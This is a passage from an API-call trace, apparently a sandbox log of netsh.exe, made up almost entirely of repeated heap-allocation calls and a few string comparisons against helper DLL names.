Size=0x8) returned 0x2b3d0f0 [0293.122] GetProcessHeap () returned 0x2b30000 [0293.122] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d110 [0293.122] GetProcessHeap () returned 0x2b30000 [0293.122] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf60 [0293.122] GetProcessHeap () returned 0x2b30000 [0293.122] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf80 [0293.122] GetProcessHeap () returned 0x2b30000 [0293.122] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf90 [0293.122] GetProcessHeap () returned 0x2b30000 [0293.122] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cd90 [0293.122] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce90 [0293.123] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cdf0 [0293.123] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce70 [0293.123] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cea0 [0293.123] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cd70 [0293.123] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cd50 [0293.123] GetProcessHeap () returned 0x2b30000 [0293.123] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cd80 [0293.124] GetProcessHeap () returned 0x2b30000 [0293.124] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf20 [0293.124] GetProcessHeap () returned 0x2b30000 [0293.124] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cde0 [0293.124] GetProcessHeap () returned 0x2b30000 [0293.124] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cec0 [0293.124] GetProcessHeap () returned 0x2b30000 [0293.124] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cee0 [0293.124] GetProcessHeap () returned 0x2b30000 [0293.124] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cda0 [0293.124] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce00 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce10 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cdb0 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cdc0 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce20 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cdd0 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.125] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf40 [0293.125] GetProcessHeap () returned 0x2b30000 [0293.126] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce80 [0293.126] GetProcessHeap () returned 0x2b30000 [0293.276] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cd60 [0293.276] GetProcessHeap () returned 0x2b30000 [0293.276] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce30 [0293.276] GetProcessHeap () returned 0x2b30000 [0293.276] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce40 [0293.276] GetProcessHeap () returned 0x2b30000 [0293.276] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce50 [0293.276] GetProcessHeap () returned 0x2b30000 [0293.276] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ce60 [0293.276] GetProcessHeap () returned 0x2b30000 [0293.276] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ceb0 [0293.277] GetProcessHeap () returned 0x2b30000 [0293.277] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3ced0 [0293.277] GetProcessHeap () returned 0x2b30000 [0293.277] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cef0 [0293.277] GetProcessHeap () returned 0x2b30000 [0293.277] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf00 [0293.277] GetProcessHeap () returned 0x2b30000 [0293.277] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf10 [0293.277] GetProcessHeap () returned 0x2b30000 [0293.277] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf30 [0293.277] GetProcessHeap () returned 0x2b30000 [0293.277] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d1d8 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.278] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d1c8 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.278] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d318 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.278] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d328 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.278] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d248 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.278] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d178 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.278] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d308 [0293.278] GetProcessHeap () returned 0x2b30000 [0293.279] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d298 [0293.279] GetProcessHeap () returned 0x2b30000 [0293.279] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d338 [0293.279] GetProcessHeap () returned 0x2b30000 [0293.279] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d348 [0293.279] GetProcessHeap () returned 0x2b30000 [0293.279] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d158 [0293.279] GetProcessHeap () returned 0x2b30000 [0293.279] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d1a8 [0293.279] GetProcessHeap () returned 0x2b30000 [0293.279] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d188 [0293.279] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d218 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d1e8 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d1f8 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d208 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d228 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d238 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.280] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d2a8 [0293.280] GetProcessHeap () returned 0x2b30000 [0293.281] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d168 [0293.281] GetProcessHeap () returned 0x2b30000 [0293.281] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d258 [0293.281] GetProcessHeap () returned 0x2b30000 [0293.281] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d198 [0293.281] GetProcessHeap () returned 0x2b30000 [0293.281] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d1b8 [0293.281] GetProcessHeap () returned 0x2b30000 [0293.281] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d268 [0293.281] GetProcessHeap () returned 0x2b30000 [0293.281] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d278 [0293.281] GetProcessHeap () returned 0x2b30000 [0293.282] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d2b8 [0293.282] GetProcessHeap () returned 0x2b30000 [0293.282] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d288 [0293.282] GetProcessHeap () returned 0x2b30000 [0293.282] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d2d8 [0293.283] GetProcessHeap () returned 0x2b30000 [0293.283] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d2c8 [0293.283] GetProcessHeap () returned 0x2b30000 [0293.283] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d2e8 [0293.283] GetProcessHeap () returned 0x2b30000 [0293.283] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d2f8 [0293.283] GetProcessHeap () returned 0x2b30000 [0293.283] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d488 [0293.283] GetProcessHeap () returned 0x2b30000 [0293.283] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d458 [0293.284] GetProcessHeap () returned 0x2b30000 [0293.284] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d438 [0293.284] GetProcessHeap () returned 0x2b30000 [0293.284] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d468 [0293.284] GetProcessHeap () returned 0x2b30000 [0293.284] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d398 [0293.284] GetProcessHeap () returned 0x2b30000 [0293.284] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d4d8 [0293.284] GetProcessHeap () returned 0x2b30000 [0293.284] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d3a8 [0293.284] GetProcessHeap () returned 0x2b30000 [0293.284] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d4e8 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.285] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d358 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.285] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d3e8 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.285] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d4b8 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.285] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d448 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.285] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d388 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.285] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d3b8 [0293.285] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d3c8 [0293.286] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d498 [0293.286] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d478 [0293.286] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d3d8 [0293.286] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d3f8 [0293.286] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d4a8 [0293.286] GetProcessHeap () returned 0x2b30000 [0293.286] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d4c8 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.287] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d518 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.287] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d4f8 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.287] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d508 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.287] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d408 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.287] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d368 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.287] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d378 [0293.287] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d418 [0293.288] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d428 [0293.288] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d7c0 [0293.288] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d8f0 [0293.288] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d7d0 [0293.288] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d790 [0293.288] GetProcessHeap () returned 0x2b30000 [0293.288] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d8e0 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.289] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d800 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.289] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d890 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.289] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d900 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.289] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d850 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.289] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d840 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.289] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d8d0 [0293.289] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d910 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d920 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d760 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d7e0 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d770 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d870 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d780 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d880 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.290] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d7a0 [0293.290] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d7f0 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d860 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d810 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d8a0 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d8b0 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d820 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.291] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d7b0 [0293.291] GetProcessHeap () returned 0x2b30000 [0293.292] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d830 [0293.292] GetProcessHeap () returned 0x2b30000 [0293.292] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d8c0 [0293.292] GetProcessHeap () returned 0x2b30000 [0293.292] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d5c0 [0293.292] GetProcessHeap () returned 0x2b30000 [0293.292] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d650 [0293.292] GetProcessHeap () returned 0x2b30000 [0293.292] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d5a0 [0293.292] GetProcessHeap () returned 0x2b30000 [0293.292] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d5b0 [0293.292] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d700 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d730 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d5d0 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d5e0 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d580 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d640 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.293] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d720 [0293.293] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d740 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d570 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d600 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d6c0 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d6a0 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d5f0 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d750 [0293.294] GetProcessHeap () returned 0x2b30000 [0293.294] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d6f0 [0293.295] GetProcessHeap () returned 0x2b30000 [0293.295] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d710 [0293.295] GetProcessHeap () returned 0x2b30000 [0293.295] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d610 [0293.295] GetProcessHeap () returned 0x2b30000 [0293.295] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d560 [0293.295] GetProcessHeap () returned 0x2b30000 [0293.295] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d590 [0293.295] GetProcessHeap () returned 0x2b30000 [0293.295] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d620 [0293.295] GetProcessHeap () returned 0x2b30000 [0293.295] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d630 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.296] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d660 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.296] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d670 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.296] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d6d0 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.296] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d680 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.296] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d690 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.296] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d6b0 [0293.296] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d6e0 [0293.297] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d9a8 [0293.297] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3db58 [0293.297] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3daf8 [0293.297] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3da88 [0293.297] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3db08 [0293.297] GetProcessHeap () returned 0x2b30000 [0293.297] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dae8 [0293.298] GetProcessHeap () returned 0x2b30000 [0293.298] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d9c8 [0293.298] GetProcessHeap () returned 0x2b30000 [0293.298] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3db18 [0293.298] GetProcessHeap () returned 0x2b30000 [0293.298] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dad8 [0293.298] GetProcessHeap () returned 0x2b30000 [0293.298] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d968 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3db48 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3da48 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d978 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3da18 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3db28 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d988 [0293.299] GetProcessHeap () returned 0x2b30000 [0293.299] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3da58 [0293.300] GetProcessHeap () returned 0x2b30000 [0293.300] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d998 [0293.300] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0293.300] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0293.300] GetProcessHeap () returned 0x2b30000 [0293.300] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x14) returned 0x2b34c50 [0293.301] GetProcessHeap () returned 0x2b30000 [0293.301] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x2) returned 0x2b3daa8 [0293.301] GetProcessHeap () returned 0x2b30000 [0293.301] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x14) returned 0x2b34e68 [0293.301] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0293.301] GetProcessHeap () returned 